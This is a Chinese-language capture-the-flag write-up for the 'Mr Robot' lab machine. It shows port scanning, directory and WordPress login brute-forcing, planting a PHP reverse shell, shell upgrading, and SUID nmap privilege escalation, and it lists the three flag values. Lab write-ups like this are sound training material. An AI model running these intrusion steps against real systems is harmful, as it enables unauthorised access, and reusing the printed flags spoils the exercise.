端口扫描
sudo nmap --min-rate 10000 -p- 10.10.228.164
开放22,80,443
端口
尝试ssh连接:
被拒绝,只能看http服务了
HTTP
打开页面会加载一段时间动画:
最后是一个模拟终端的界面,右键查看源代码没有发现什么有效的东西
尝试进行目录爆破
目录爆破
sudo dirsearch -u http://10.10.228.164
通过爆破发现了后台登录以及robots.txt
http://10.10.228.164/wp-admin.php
http://10.10.228.164/robots.txt
发现两个文件
fsocity.dic
key-1-of-3.txt
得到第一个key:073403c8a58a1f80d943455fb30724b9
而另外一个文件,应该是一个字典文件:
后台爆破
尝试用该字典爆破admin,但是好像不行
尝试爆破用户(这里get到了一个新的知识点,在账号与密码都不正确的情况下,爆破用户名返回值也不同)
猜测用户名为:Elliot
尝试用该字典爆破密码,但是总数太多(又从别的师傅那里get到知识点)
可以先将字典排序并去重:
sort fsocity.dic |uniq > new.dic
使用wpscan爆破密码:
wpscan --url http://10.10.228.164/wp-login.php --usernames Elliot --passwords ./new.dic
登录后台
尝试能不能反弹shell
在编辑界面,有一堆php文件,随便找一个弹shell就行
反弹shell
cat /usr/share/webshells/php/php-reverse-shell.php
kali获取反弹shell代码
设置好端口和IP
curl 10.10.10.10/whoami
获取kali连接VPN后的IP
同时开启监听:
成功获取shell
提权
首先用python获取一个交互性好的shell
python -c "import pty; pty.spawn('/bin/bash')"
进入到/home目录下:
继续进入
第一个文件权限不够,第二个可以查看
robot:c3fcd3d76192e4007dfb496cca67e13b
文件后缀为md5,尝试md5解密
成功解密:abcdefghijklmnopqrstuvwxyz
尝试登录robot用户
成功登录,查看key-2-of-3.txt
成功获得第二个key822c73956184f694993bede3eb39f959
接下来就不是很会了(继续借鉴)
find / -type f -perm -04000 -ls 2>/dev/null
使用suid提权
根据提示,看到了nmap
https://gtfobins.github.io/ 访问并查看nmap提权:
nmap --interactive
!sh
提权成功
获取第三个key
04787ddef27c3dee1ee161b21670b4e4
总结
【THM】Mr Robot CTF-练习 - Hekeatsl - 博客园
借鉴了该师傅的东西,通过打这个靶机也学到了不少思路,感谢师傅!